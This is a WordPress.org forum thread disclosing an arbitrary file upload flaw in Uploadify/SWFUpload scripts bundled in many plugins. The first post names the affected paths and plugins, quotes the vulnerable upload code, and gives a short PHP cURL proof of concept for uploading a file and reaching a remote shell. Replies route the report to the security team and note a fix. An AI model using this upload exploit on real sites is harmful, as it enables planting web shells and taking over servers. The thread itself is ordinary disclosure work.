WordPress.org

Ready to get started?Download WordPress

Forums

UPLOADIFY AND SWFUPLOAD ARBITRARY FILE UPLOAD (6 posts)

  1. A-T
    Member
    Posted 2 years ago #

    In all plugins that contains this lib :

    -> js/swfupdate/js/upload.php
    -> upload/php.php
    -> includes/doajaxfileupload.php
    -> uploadify/uploadify.php

    and more...

    Ex vuln plugins :

    -> front-end-upload
    -> front-file-manager
    -> omni-secure-files

    Ex vuln code :

    <?php
    /**
     * upload.php
     *
     * Copyright 2009, Moxiecode Systems AB
     * Released under GPL License.
     *
     * License: http://www.plupload.com/license
     * Contributing: http://www.plupload.com/contributing
     */
    
    // HTTP headers for no cache etc
    header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
    header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
    header("Cache-Control: no-store, no-cache, must-revalidate");
    header("Cache-Control: post-check=0, pre-check=0", false);
    header("Pragma: no-cache");
    
    // we need these WP files to grab our destination dir
    ob_start();
    require_once( preg_replace( "/wp-content.*/","wp-load.php", __FILE__ ) );
    require_once( preg_replace( "/wp-content.*/","/wp-admin/includes/admin.php", __FILE__ ) );
    ob_end_clean();
    
    // Settings
    //$targetDir = ini_get("upload_tmp_dir") . DIRECTORY_SEPARATOR . "plupload";
    $targetDir = FEU_DESTINATION_DIR;
    [...]

    exploits code :

    <?php
    $u="C:\Program Files (x86)\EasyPHP-5.3.9\www\info.php";
    $c = curl_init("http://site.com/PLUGIN-NAME/uploads/uploadify.php");
    curl_setopt($c, CURLOPT_POST, true);
    curl_setopt($c, CURLOPT_POSTFIELDS,
    array('Filedata'=>"@$u"));
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    $e = curl_exec($c);
    curl_close($c);
    echo $e;
    ?>

    Remote shell "shell.php" is accessible from folder upload or temp.

  2. I've not been able to locate those plugins (I blame a lack of sleep).

    If that's from plugins that's hosted in the WordPress repository can you email the details of which plugins AT wordpress.org or security AT wordpress.org?

    As with other vulnerable software (think timthumb) that's a very serious issue.

  3. A-T
    Member
    Posted 2 years ago #

    I just sent you a mail

  4. It's not me as I'm not on either of those teams, but thank you. Informing the correct people is appreciated. ;)

  5. A-T
    Member
    Posted 2 years ago #

    Sure

    Lot's of most-used plugins are concerned (> 100)

  6. Jonathan Christopher
    Member
    Posted 2 years ago #

    I've updated Front End Upload to close this issue with that plugin.

Topic Closed

This topic has been closed to new replies.

About this Topic